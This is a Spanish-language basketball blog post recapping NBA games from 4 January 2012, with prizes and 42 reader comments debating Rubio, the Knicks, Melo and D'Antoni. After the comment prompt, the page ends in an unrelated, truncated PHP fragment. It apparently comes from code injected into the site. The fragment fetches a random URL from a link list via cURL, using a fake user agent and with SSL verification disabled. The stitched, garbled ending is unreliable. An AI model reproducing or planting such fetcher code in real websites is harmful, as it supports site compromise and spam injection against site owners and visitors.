La Crónica (04/01/2012): Resistencia

05 de January de 2012 por TheDeerHunter

rickylayLas victorias de Heat sin Wade, Grizzlies sin Randolph y Spurs sin Ginóbili fueron de lo más destacado de la noche. Abrimos la crónica, sin embargo, con una nueva gran actuación de Ricky Rubio, con un doble-doble y tirando del carro en los momentos más calientes del partido. Junto a Love como los más destacados, volvieron a ilusionar a la parroquia de Minneapolis peleando la victoria hasta el final, pero volvieron a quedarse a las puertas por culpa de errores propios, las pérdidas y los tiros libres. Los Grizzlies se llevaron el gato al agua a pesar de la baja de Zach. Marc le echó de menos en un partido algo gris, pero lo compensaron Mayo, Gay y sobre todo Allen en una serie de tiro inmaculada.

Gran actuación también de Jose Calderon contra Irving y victoria, en un momento dulce suyo y de los Raptors, con Bargnani y DeRozan destacados. Por un día también podemos sentirnos satisfechos del rendimiento de Rudy disfrutando de más minutos que nadie en Denver y aprovechándolos. El viejo George Karl ha encontrado en él una especie de segundo constructor, rol que le viene de perlas a los Nuggets. No tuvieron problemas ante los desquiciados Kings, por cierto.

Por lo demás se impuso la lógica durante la jornada, en todos los casos excepto en el de los “sospechosos habituales” Knicks, que fueron humillados en casa por Diaw y sus Bobcats. Empieza a ser verdaderamente preocupante la situación.

Hubo varios partidos sin historia: Orlando destrozó a Washington; Boston también se comió unos Nets en cuadro; Bulls, Heat y Clippers sometieron a Pistons, Pacers y Rockets respectivamente.

Algo más trabajadas fueron las victorias de los Sixers sobre Hornets y la de Spurs sobre Warriors. Manudo estará un par de meses lejos de las pistas y los Spurs han recuperado a Danny Green. En los Warriors se lesionó Stephen Curry. Se desconoce la gravedad, pero de momento los de Oakland ya han anunciado la incorporación de Nate Robinson.

Finalmente destacamos la victoria de Dallas sobre Phoenix en el partido Nº 1.000 de Nowitzki en la NBA. Bonita cifra.

Top 10

PREMIOS

MVP: Un cuarto aguantaron los Pacers la avalancha LeBron. Sin Wade, James asumió las riendas de los Heat y se fue hasta los 33 puntos, 13 asistencias, 8 rebotes y 2 recuperaciones. Menos todavía resistieron los Wizards, prácticamente rendidos de inicio ante la pareja Dwight Howard & Ryan Anderson, quienes sumaron 51 puntos y 35 rebotes. También merece mención el 22 de 28 en tiros de campo (51 puntos) logrado entre Gerald Henderson y Boris Diaw en el MSG.

Rookie: La madrugada vio actuaciones discretas de Irving, Walker, Fredette… pero permitió volver a ver en acción a Iman Shumpert, de nuevo notable (18 puntos, 5 rebotes, 3 asistencias, 2 robos). Ricky Rubio, por su parte, logró su segundo doble-doble con 12 puntos, 10 asistencias, 4 rebotes y 2 robos en casi 32 minutos de juego.

Sorpresa: Aunque sus estadísticas no lo expresen del todo, la primera victoria de los Spurs sin Ginóbili se debe fundamentalmente al último cuarto protagonizado por TJ Ford y Danny Green. En el tramo decisivo, Ford anotó 7 puntos y repartió 4 asistencias, y Green aportó 4 puntos y 2 tapones. Conste además en acta que Brian Cardinal, al fin, anotó un triple.

Decepción: Los Wizards son el único equipo sin victorias esta temporada, y eso no es lo peor. Su imagen, cada noche, es lamentable, y en ocasiones (como anoche, ante los Magic) roza el esperpento. En el aspecto individual fue una noche repleta de actuaciones decepcionantes. Una que empieza a convertirse en habitual es la de Dorrell Wright, quien ha perdido toda la confianza y, por segundo partido consecutivo, se quedó a 0.

Esfuerzo en vano: Intentando compensar la lesión de Steph Curry y la desaparición de Wright, Monta Ellis protagonizó un esfuerzo encomiable y se quedó muy cerca de la proeza. Finalmente, 38 puntos, 7 asistencias y 2 robos no valieron un triunfo.

Imágenes | AP Photos / Getty Images

Comenta

42 comentarios a esta entrada

  1. Nacho dice:
    #1

    Anoche, influido por el debate de ayer me propuse ver a Rubio y a Irving (realmente a éste lo intenté ver porque soy de los Raptors-nadie es perfecto-)
    Empecé a ver el partido de Toronto y terminé de ver el de Minneápolis. El sueño se apoderó de mí entre medias.
    En cuarto y medio Irving no me dijo nada, y su hoja de estadísticas es pobre. (Esto lo digo para aquellos que lo cifráis todo en esto)
    Un minuto del tercer cuarto y el final del partido vi de los Wolves. Ricky a punto estuvo de tener una noche para enmarcar, dos tiros libres fallados, un par de pérdidas ¿ó fue solo una?, y el partido perdido, lo impidieron. Al final se quedó en una buena noche… para su hoja de estadísticas.
    Pero no me creo a pies juntillas las estadísticas, ya lo he dicho, y lo de la lucha del ROY y todas esas bobás, ahora no tienen sentido. (Aunque ahora aparecerá por aquí Denise diciendo que lo merece Norris Cole, pero no le hagáis caso, es de los Magic, que es casi peor que ser de los Knicks -lo de Toronto no cuenta que son canadienses-) Pero viendo la “profundidad” del debate de ayer propongo a Txusma que modere un programa de TV “nbaeros” y nos pasemos dos horas diarias dándonos voces sobre los temas estrella, íbamos a arrasar a los de futboleros.
    Por otro lado, voy a sacar pecho con los míos (yo sí puedo Melo) y resaltar a un par de tíos a los que hemos dado por aquí de lo lindo. Calderón está haciendo un inicio de temporada espectacular (probablemente porque sabía que por aquí corría un libelo en el que le daban pal pelo), y Bargnani está en modo All-Star, me he metido con él entre burlas y veras, pero empieza a ser lo que prometía y nadie creía, quizás hemos echado en falta algo más de consistencia en el último cuarto contra Orlando, pero eso llegará si continúa así (por cierto, no pasaba nada si hoy le dábamos el MVP)
    P.D. Txusma, lo de “nbaeros” va en serio. Imagina, a Esteban conectado vía Web desde Argentina, Melo con el ipad desde clase (de lengua no, por favor), yo desde mi llanura manchega y prometo ponerme en modo tío de la vara, y el resto… bueno al resto os tomo un poco más en serio… pero no mucho. Un abrazo cracks.

      Citar

  2. inad23 dice:
    #2

    Ayer vi el partido de los Wolves y a ratos los Knicks. En los Wolves menos Rubio Love y Ridnour los demas no estubieron bien,sobre todo es para hacerselo ver a W.Johnson(supuestamente tirador) que no enchufa ni una,mas Beasley que no entiendo como Adelman le da mas minutos que a D.Williams,un chico que tira mejor que el,le hecha mas ganas y permite juego en equipo.Inmenso partido de Wolves.Este equipo no puede aspirar a playoffs con W.Johnson,Beasley y Milicic de titulares, es que no puedes,puede que Beasley tenga mucha calidad,pero no permite juego en equipo. Milicic es un jugador de banquillo y Johnson no enchufa nada,vaya decepcion (que pick del draft fué?) en fin,partidazo de Love(no tan monstruoso como los otros,pero partidazo),muy bueno de Ricky que cambio la dinamica del encuentro, normal de Ridnour y bien Williams,les hizo falta a Barea ayer. Por parte de los Grizzlies Gay es muy bueno,pero es muy chupón (no he descubierto nada ahora) pero las canastas del ultimo cuarto algunas son de super clase, Gasol jugo bastante mal y Rubio se comio a Conley (vaya 2 faltas en ataque le saco en el ultimo cuarto).Los Knicks preocupantes nose a que juegan,cuando cambien de entrenador se vera su potencial,D’Antoni no vale.
    PD:Perdon por la parrafada xD

      Citar

  3. inad23 dice:
    #3

    *Queria decir que inmenso Love,no los Wolves xD

      Citar

  4. Blade Petrovic dice:
    #4

    Menos ma que los bobcats eran una panda que no hacían nada.Pero mira a mí siempre me ha usatado especialmente los bases que es lo q tienen bueno.Y Mlo tu qerido Kemba a ganado a los Knicks
    Pd: lo del top ten que era para un solo dia Txus

      Citar

  5. RSB dice:
    #5

    Lo de los Wizards es para traspasar a todo el equipo. Vaya panda de malcriados, ya pueden conseguir rondas del draft que con esos huevones lo tienen imposible para hacer nunca nada. Y Wall se está desinflando siguiendo los pasos de Evans.

    Buen día para Rudy parece, 3 asistencias showtime en los highlight.

    Los mejores rookies hasta el momento Rubio, Cole, Shumpert, Brooks y Morris (el de los Suns). Y seguro que me dejo alguno pero los destacados que me vienen son estos (y no son posiciones altas que se diga, ¿se confirma el bluff de draft?)

      Citar

  6. nach dice:
    #6

    Para mí D’Antoni es más que válido, el problema es que no tiene jugadores válidos para hacer su juego, no se si por petición suya o por movidas del equipo, pero un equipo a lo D’Antoni, es decir, posesiones rápidas, movilidad, el balón mucho tiempo en manos del base, pick & roll… no puede tener a Stat y Melo, es decir, Stat es perfectamente compatible, de hecho es probablemente el 4-5 perfecto para jugar así, pero Melo acapara demasiado el balón, rompe la velocidad de las posesiones, vuelvo a lo mismo, Marion y Diaw en Phoenix, siendo mucho más limitados que carmelo, eran meros ejecutores prácticamente, el balón les llegaba en posiciones o bien para tirar o bien para encarar el aro, Carmelo es otro tipo de jugador que necesita acaparar balón.

    Y lo de Chandler pues puede que D’Antoni aprendiera algo de los Suns, yo creo que está intentando hacer unos Suns 2.0 mejores en ataque estático y sobre todo en defensa de hombres altos, pero con más movilidad y agilidad que Shaq, el problema es que Shaq en ataque aportaba muchas cosas que Chandler no puede.

    Yo veo 3 posibles soluciones al problema:
    1) Largar a D’Antoni
    2) Largar a Carmelo
    3) Hacer que Carmelo cambie su forma de jugar a ser más un finalizador y no acaparar la bola.

      Citar

  7. MagicJohnson32 dice:
    #7

    Actualizada la crónica con el vídeo del Top 10.

      Citar

  8. ralage dice:
    #8

    1-Alguien tiene que decirles a los Knicks que en el Este la defensa es lo primero.118 pts de los Bobcats….venga hombre!
    2-Vamos a ver hasta que punto RGay puede tirar de los Grizzlies confirmada la lesión de Randolph..
    3- Estoy deseando ver el partido de Ricky, la verdad es que no tenía ninguna confíanza en él

      Citar

  9. MagicJohnson32 dice:
    #9

    Los Nets han pasado de soñar un equipo con Deron y Dwight, a tener uno con MarShon Brooks como mejor jugador. Están a una lesión larga de Deron Williams de convertirse en el equipo con menos victorias de la historia.

      Citar

  10. melo15 dice:
    #10

    Nach, creo que te esta equivocando, si acaso largaran a Stat, porque esta temporada es Melo el que esta ganando los partidos, como contra los Celtics, si acaso largan a Stat y se adaptan a Melo, porque hay que jugar como los Suns? No lo entiendo que D’antoni se vaya y que cambien el estilo de juego.
    PD: te recuerdo que la temporada pasada fue Carmelo el que tiro del equipo cuando Stat y Billups estaban lesionados:Bucks 42 Celtics 40…

      Citar

  11. HisRoyalAirness dice:
    #11

    Un entrenador ha de adaptarse a sus jugadores, sino serà un mal entrenador. Más aun si tienes jugadores buenos.
    Si D’Antoni solo sabe jugar Run&Gun con Nash (no te jode, también lo juego yo) que se quite esa vítola de super-entrenador. Es SU deber que el equipo funciones. Melo hace lo que le mandan y lo que sabe hacer o es que no sabIan que era un anotador con necesidad de balón?
    Que los Bobcats te metan semejante paliza es problema tàctico, defensivo o de motivación, cosas mayoritariamente responsabilidad del coach.

      Citar

  12. HeiNeKeN dice:
    #12

    Ayer perdieron los Wolves el partido ellos solos. Los tiros libres estan siendo decisivos para ellos, fallan demasiados y con tantos partidos perdiendo por la mínima eso se nota.

    Ricky + Ridnour en pista no funciona, el equipo juega mal así, que se de cuenta Adelman de eso. Que se de cuenta también de que Beasley no puede seguir así. Tiene a Derrick Williams enchufadisimo cada vez que sale, pero solo lo aprovecha un cuarto, el resto del partido se olvida de el, y ayer era uno de esos partidos en los que a Beasley no le entra ningun tiro (eso si, el tio se lanzó a por un balón al suelo, lo recuperó y acabó en canasta de Love, me sorprende en él. Demuestra que se implica, pero si no te sale nada en ataque y Gay te está destrozando en defensa, ¡¡al banquillo!!).

    Ayer Ridnour en el ultimo cuarto, fatal, no voy a decir que perdió el partido, pero practicamente, hizo una falta fraglante, luego otra falta tonta, tuvo un par de tiros solo que acabó doblando a Tolliver y este la perdió en ambos, y luego el paripe ese en el último tiro libre… de traca.

    PD: Rudy Gay ayer impresionante, reboteando en ataque y enchufandolas de todos los colores.

      Citar

  13. nach dice:
    #13

    melo15:
    Nach, creo que te esta equivocando, si acaso largaran a Stat, porque esta temporada es Melo el que esta ganando los partidos, como contra los Celtics, si acaso largan a Stat y se adaptan a Melo, porque hay que jugar como los Suns? No lo entiendo que D’antoni se vaya y que cambien el estilo de juego.
    PD: te recuerdo que la temporada pasada fue Carmelo el que tiro del equipo cuando Stat y Billups estaban lesionados:Bucks 42 Celtics 40…

    Yo entiendo que si fichan a D’Antoni es para jugar a eso, si no sería un sinsentido xD
    Para ver el nivel real y la adaptación real del equipo a eso habrá que esperar a que vuelva Davis, es decir, a Febrero más o menos, en esos momentos se podrá comprobar si el equipo se adapta o no correctamente, pero hasta entonces Stat ha demostrado ser capaz de funcionar en un equipo D’Antoni perfectamente, y Melo todavía no, pero el tema de no tener base también influye bastante, pero vamos, yo optaría por la opción 3 de las que puse clarísimamente, especializar a Melo en que sea un finalizador, que lo podría ser extraodinario, no es necesario pedirle que haga de LeBron

      Citar

  14. melo15 dice:
    #14

    No entiendo tu mensaje Royal

      Citar

  15. rumbero dice:
    #15

    Yo no quiero darles más caña a los Knicks, que en el fondo me caen bien, pero que los Bobcats metan 118 puntos en el Madison es de traca.

    PD: Los Grizzlies se refuerzan con M. Speights. A ver que tal le va que ultimamente en Philadelphia no le daban bola.

      Citar

  16. MagicJohnson32 dice:
    #16

    Hoy publicamos el análisis de los Knicks. Lo digo porque tal vez sería un buen sitio para trasladar el debate, realmente interesante.

      Citar

  17. melo15 dice:
    #17

    SI HOMBRE ESPECIALIZAR A MELO, que D’antoni se especialice a el, que para eso es el entrenador.
    PD:claro que Stat sabe jugar con D’antoni, lleva jugando con el toda la vida!!!
    El primer error fue traspasar a todos eso jugadores:Gallinari… Yo habria esperado a que Melo fuese agente libre y habria traspasado a Gallo y Chandler por jugadores interiores, os imaginais.
    Felton-Fields-Melo-Stat-Chandler
    Mas lo que consigues de esos traspasos que es mucho

      Citar

  18. RSB dice:
    #18

    Los Grizzlies tiran a Vasquez y ahora a Henry por interiores del montón… Joder con la baja de Arthur, repercusión para este año y para el futuro

      Citar

  19. Denise dice:
    #19

    – En la porra, metí a los Wizards en Playoffs. Yo aun confio en ellos.
    – Con lo bien que estaban los Knicks con Felton, Gallinari, Wilson Chandler, Mozgov..para una vez que les estaba saliendo bien las cosas…Melo como jugador franquicia nunca ganará un anillo, y con Amare de escudero menos.
    – Lebron confirmandome dia a dia que es el mejor jugador que he visto en mi vida “en directo” (a Jordan solo lo he visto en Washington y los tipicos highlights de los 6 anillos en Bulls)

    Nacho: (Aunque ahora aparecerá por aquí Denise diciendo que lo merece Norris Cole, pero no le hagáis caso, es de los Magic, que es casi peor que ser de los Knicks -lo de Toronto no cuenta que son canadienses-) Pero viendo la “profundidad” del debate de ayer propongo a Txusma que modere un programa de TV “nbaeros” y nos pasemos dos horas diarias dándonos voces sobre los temas estrella, íbamos a arrasar a los de futbolerosTxusma, lo de “nbaeros” va en serio. Imagina, a Esteban conectado vía Web desde Argentina, Melo con el ipad desde clase (de lengua no, por favor), yo desde mi llanura manchega y prometo ponerme en modo tío de la vara, y el resto… bueno al resto os tomo un poco más en serio… pero no mucho. Un abrazo cracks.

    Si, de lo que llevamos Norris Cole rookie del año sin ninguna duda.

    Sobre lo de “NBAeros”, Melo es clavado a Roberto Gomez, y los del Villarato de la mesa derecha me recuerda al Sternato y el veto jeje yo seria mas un David Sanchez..

      Citar

  20. Blade Petrovic dice:
    #20

    Txus podrias hacer una nueve pregunta con: Cúal es el jugador NBA que mas odias?
    Apuesto a que al menos dos ponemos a melo

      Citar

  21. melo15 dice:
    #21

    Le teneis envidia, quien es Roberto Gomez (seguro que es un gran tipo)

      Citar

  22. Blade Petrovic dice:
    #22

    A melo si a mi Melo me parece un tipo q por desgracia para el estara a la sombra de Lebron qe a mi parecer es un tipo muchiiiiiiiiiiisimo mas completo que fue capaz de llevar un equipo de paquetes(gooden,iglauskas,gibson….)a una final de conferencia cuando el equipo de melo tenia a dos de los 7 maximos anotadores i al jugador defensivo del año y con mejor rotacion (Martin, Nene,jr smith)…. y solo quedaron octavos
    ya se que iverson no era lo mejor para melo y para mi a melo le costara ganar un MVP de la regular pq tiene delante a gente como lebron,wade,kobe y dirk.
    Pd:melo tuvo mala suerte de que le tocara delante un tipo como lebron y el roy se lo tendria q haber llevado el

      Citar

  23. MagicJohnson32 dice:
    #23

    Denise:
    – En la porra, metí a los Wizards en Playoffs. Yo aun confio en ellos.

    Tranquilo, se te pasará en cuanto los veas jugar.

    PD: Porque si los has visto jugar y sigues confiando en ellos, entonces lo tuyo es grave :p)

      Citar

  24. melo15 dice:
    #24

    Los que has dicho dos quedan descartados, como dijo Lebron al juntarse los 3 al mismo tiempo rechazaron ganar el MVP y Dirk y Kobe no lo haran mucho mejor que Melo

      Citar

  25. Blade Petrovic dice:
    #25

    Melo lebron hizo un temporadon y se merecia el MVP del año pasado y puede ganar el de este año y sino ya le toca a Durant qe es como melo pero ANOTA más

      Citar

  26. melo15 dice:
    #26

    Jolines no habia contado con Durant

      Citar

  27. MagicJohnson32 dice:
    #27

    ¿Y con Dwight Howard?

      Citar

  28. Denise dice:
    #28

    Blade Petrovic: Txus podrias hacer una nueve pregunta con: Cúal es el jugador NBA que mas odias?Apuesto a que al menos dos ponemos a melo

    Michael Beasley

      Citar

  29. melo15 dice:
    #29

    Howard si seran 6 como mucho

      Citar

  30. Cocinitas dice:
    #30

    Bien vayamos por partes. Primero, Melo quiero decirte que si los Knicks no hubieran traspasado a Gallinari, Felton y Mozgov y Chandler, Carmelo no estaria en los Knicks ya que lo que tu propones no se podria llevar a cabo ya que no hubieran tenido hueco salarial para firmarle un contrato como agente libre.
    Dos, el jugador que más odio es Rudy Gay.
    Y tres, por Dios Carmelo jamas ganará un MVP con gente como Lebron, Durant, Rose, Griffin, Howard, etc hay al menos 10 jugadores mejores que él en la NBA. En cuantos primero y segundos equipos de la temporada ha estado Melo en 8 año que lleva en la liga??

      Citar

  31. shaggy dice:
    #31

    Marreese Speights ya es un Grizzly. El pívot de los Sixers ha sido traspasado a Memphis en una operación a tres bandas que llevó a Xavier Henry a New Orleans, y dos segundas rondas del draft (una desde los Grizzlies y otra desde los Hornets) a Philadelphia. Fuente: nbamiancs

    Que os parece esta incorporacion?¿ a mi me parece que mejora a Arthur, aunq Speights es un jugador muy muy irregular

      Citar

  32. HisRoyalAirness dice:
    #32

    Denise: Michael Beasley

    A Beasley debería sentarle alguien en una sillita y decirle muy seriamente: “chaval, no eres ni Michael Jordan, ni Larry Bird así que deja de tirarte TODO lo que llega a tus manos”.

    Si fuese los Wolves le dejaría hacer números unos partidos y lo mandaba a paseo

      Citar

  33. melo15 dice:
    #33

    Griffin no es mejor que Melo

      Citar

  34. Viva_Dirk dice:
    #34

    Griffin seria elegido por delante de Melo en cualquier lista para liderar una franquicia. Para ser considerado por delante de otros All-Stars debe hacer algo grande en los proximos 2 o 3 años como máximo.

      Citar

  35. Viva_Dirk dice:
    #35

    HisRoyalAirness: A Beasley debería sentarle alguien en una sillita y decirle muy seriamente: “chaval, no eres ni Michael Jordan, ni Larry Bird así que deja de tirarte TODO lo que llega a tus manos”.

    Si fuese los Wolves le dejaría hacer números unos partidos y lo mandaba a paseo

    Mmmm, no tengo nada claro el tema Beasley, esta claro que no es el perfil de jugador que mas necesitan los Wolves, pero no creo que sea facil conseguir un buen traspaso por el. Lo ideal sería conseguir un escolta defensivo y físico para poder desplazar a Wes Johnson a su posición natural, alguien como Tony Allen sería perfecto, pero no hay muchos de esos que sean transferibles y que a sus equipos les haga falta un Beasley.
    Mas facil veo intentar traspasarlo por un veterano, Ray Allen o Ginobili serían perfectos.

    Y ojo, siempre esta el hecho de que el equipo acaba de juntarse, puede que segun pase el tiempo Beasley se haga mejor a los compañeros, y si así fuese tendrían un arma que pocos equipos tienen.

      Citar

  36. Sancho88 dice:
    #36

    Buenísimo melo con lo de Roberto Gómez (fijo que es un gran tipo)… En fin. Es que siempre hay algún comentario tuyo que me despoyo de la risa, y fijo que no lo haces a propósito. Con tanto partido cada noche yo creo que estamos perdiendo un poco el norte. De Nueva York no podemos decir nada hasta verles como funcionan con el señor Baron Davis. Yo creo que es un gallinero de talento que necesitan el liderazgo de un señor con pelos en los cojones y pájaros anidados en la barba. Es como un patio de recreo en el que de repente llega el conserje con el manojo de llaves a poner paz. A partir de ahí, veremos realmente quiénes son estos Knicks y si D’Antoni no está a la altura. Personalmente, nunca me ha gustado este tío. El Run&Gun famoso se lo inventó Nash porque era un genio, y teniendo a Marion en su mejor momento y Stat físicamente más espectacular que ahora, pues sí, nos pasamos unos años de vicio.

    Otro tema que no estamos tocando apenas: LA Clippers. Creo que sería el equipo más a destacar desde el final de lockout, no solo por la polémica llegada de Chris Paul, sino porque están demostando desde el principio que van en serio. Yo tengo una teoría, los equipos que me resultan aburridos de ver -espero no ofender a muchos- siempre suelen llegar muy lejos. Y no soporto ver partidos de los Celtics, de Spurs, de Orlando… y ahora me pasa lo mismo con los Clippers. Me aburre que tengan automatizados tantos detalles, y que sepan como llevar los partidos paso a paso. Es como si cada partido fuese un calco del anterior. Yo prefiero a clubes más imprevisibles, me divierto más con ellos. Dicho esto, que nadie se piense que critico a Clippers, pero ante un Nueva York-Denver Nuggets y un Clippers-Houston… sé que los primeros no llegarán muy lejos, pero que leches, quiero ver si Douglas se juega 20 triples o si Bill Walker por fin valora positivo. XD.

    Pero como bien ha dicho Magic, deberíamos llevar el debate al análisis de Nueva York. Me parece que va a batir todos los records de comentarios. Que Walter Frazier nos pille confesados!!

      Citar

  37. Viva_Dirk dice:
    #37

    – Lebron confirmandome dia a dia que es el mejor jugador que he visto en mi vida “en directo” (a Jordan solo lo he visto en Washington y los tipicos highlights de los 6 anillos en Bulls)

    Pero hombre, ¿es que no has visto ni un partido de los Lakers en los últimos 12 años? Lebron es una bestia, pero para ser el mejor en algo tienes que ganar. Vamos, mejores jugadores que el he visto unos cuantos, la mejor versión de Kobe, Dirk y Garnett, el Wade de la final de 2006, Duncan ganando un anillo si y uno no y Shaq comiendose casi literalmente rivales; todos estos ganadores de un anillo.

      Citar

  38. Sancho88 dice:
    #38

    por cierto, gran debut ayer de Gordon con los Hornets, que también son ‘muy listos’ y podrían haberse piyado a Mo, Bledsoe… en fin. El equipo no llegará a PO por ese motivo. No tienen base

      Citar

  39. Sancho88 dice:
    #39

    McGrady se carga a los Heat. Santo dios!! debería estar vivo Montes para ver esto

      Citar

  40. Sancho88 dice:
    #40

    Como siempre me adelanto, xd. al final prórroga, a ver que pasará. está el partido emocionantísimo. miami aun sin Wade y Lebron plantando cara a los Hawks

      Citar

  41. Sancho88 dice:
    #41

    wowowwowowo!!!!!! jornadón. los hawks al final han hincao la rodilla ante unos enormes Bosh y Chalmers. el triple de Bosh sobre la bocina forzó la primera prórroga y después todo fue muy igualado pero ya digo que estos dos la clave. y mis kings!!! ole mis kings. evans has come!!! con corrillo de liderazgo absoluto en el ultimo tiempo muerto. puede ser la resurreccion de los kings. encima, 9 de 9 en tiros libres, cuando llevaba un 50 por cien esta temporada. Al final, doble-doble 26+10, más 5 asistencias y 2 robos. Eso sí, 5 pérdidas por la gran defensa de Jennings, que ha sido el único destacable en Milwaukee. En los momentos claves, Jackson se ha cagao y Gooden lo mismo, y Udrih intentando vengarse de su ex equipo ha naufragado!! Está claro que Westphal era un lastre el cabrón, a ver si por su cuenta los jugadores son capaces de reaccionar, jugando más liberados y sin presión, y sumando a un grande como Cousins. Ojalá el nuevo entrenador se lleve bien con él y se le vuelva la cabeza a su sitio. Con Evans, Thornton, Salmons, Hickson y Cousins al 100% de concentración, pueden liarla contra cualquiera, aunque son irregulares como ellos solos. Hoy Thornton se ha controlado un poco más, ‘solo’ un 10 de 23 en tiros. Al menos en los momentos finales solo ha hecho una cagada, no como habitualmente que se tira todas el. Hoy me voy a dormir feliz, coño. xd

      Citar

  42. Denise dice:
    #42

    Sancho88:
    por cierto, gran debut ayer de Gordon con los Hornets, que también son ‘muy listos’ y podrían haberse piyado a Mo, Bledsoe… en fin. El equipo no llegará a PO por ese motivo. No tienen base

    Bueno, Gordon ya jugó con los Hornets el primer partido vs Suns, y ganó el solito el choque con un tiro a falta de 4 segundos.

    Yo he visto el duelo tejano (los 3 primeros cuartos, el ultimo no tenia sentido de verlo) y pfff vaya partido en conjunto de Dallas ante unos Spurs que no son nada del otro mundo con Ginobili lesionado y Duncan semi-acabado.
    Neal y un sorprendente para bien Jefferson se han zumbado en el primer cuarto a Dallas a base de triples y tiros de dos respectivamente. Despues sale en el segundo cuarto Bonner y la lia parda con su unico recurso, el tiro de 3 sin que no haya ninguno de los muchos 4 que los Mavs tienen (Marion, Nowitzki, Odom) que defienda a un tio con un fisico tan limitado como el del pelirrojo.
    El tercer cuarto, un festival de errores por parte de los dos equipos, y al final del tercer cuarto los Mavs, en concreto Jason Terry, meten el primer triple despues de un monton de intentos, mientras que los Spurs ya llevaban 8 o 9 triples por entonces.
    El ultimo cuarto no lo he visto
    En fin, que esperaba un partido minimamente emocionante y me ha aburrido porque no ha tenido historia. Ojala hubiera elegido ver el Miami-Atlanta.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>